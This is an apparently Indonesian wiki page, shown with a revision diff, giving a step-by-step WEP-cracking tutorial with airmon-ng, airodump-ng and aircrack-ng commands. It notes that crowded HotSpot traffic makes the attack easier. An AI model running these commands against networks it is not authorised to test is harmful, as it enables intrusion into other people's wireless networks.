Difference between revisions of "Teknik Menjebol WEP Menggunakan Airodump dan Aircrack"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 18: | Line 18: | ||
− | Untuk memudahkan operasi ada baiknya melakukan | + | Untuk memudahkan operasi ada baiknya melakukan di shell |
− | + | export AP=00:30:4F:4E:2B:50 | |
− | + | export WIFI=00:11:6b:33:d3:90 | |
− | + | export CHANNEL=1 | |
Setup supaya interface [[WiFi]] masuk ke mode monitoring menggunakan perintah | Setup supaya interface [[WiFi]] masuk ke mode monitoring menggunakan perintah | ||
− | + | airmon-ng start wlan0 1 | |
Biasanya akan tampil kira-kira sebagai berikut | Biasanya akan tampil kira-kira sebagai berikut | ||
Line 38: | Line 38: | ||
Jalankan [[airodump]] di [[WLAN]] mon0 | Jalankan [[airodump]] di [[WLAN]] mon0 | ||
− | # airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL | + | # airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0 |
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking [[WEP]] pastikan kita dapat menangkap lebih dari 5000 paket. | Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking [[WEP]] pastikan kita dapat menangkap lebih dari 5000 paket. | ||
Line 45: | Line 45: | ||
# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs | # aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs | ||
+ | |||
+ | misalnya | ||
+ | |||
+ | # aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs | ||
+ | |||
Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan [[HotSpot]]. | Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan [[HotSpot]]. |
Revision as of 11:33, 25 November 2009
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan susah untuk di crack WEP-nya.
- Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan di shell
export AP=00:30:4F:4E:2B:50 export WIFI=00:11:6b:33:d3:90 export CHANNEL=1
Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
airmon-ng start wlan0 1
Biasanya akan tampil kira-kira sebagai berikut
Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.
Jalankan aircrack untuk mengcrack WEP
# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs
misalnya
# aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs
Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.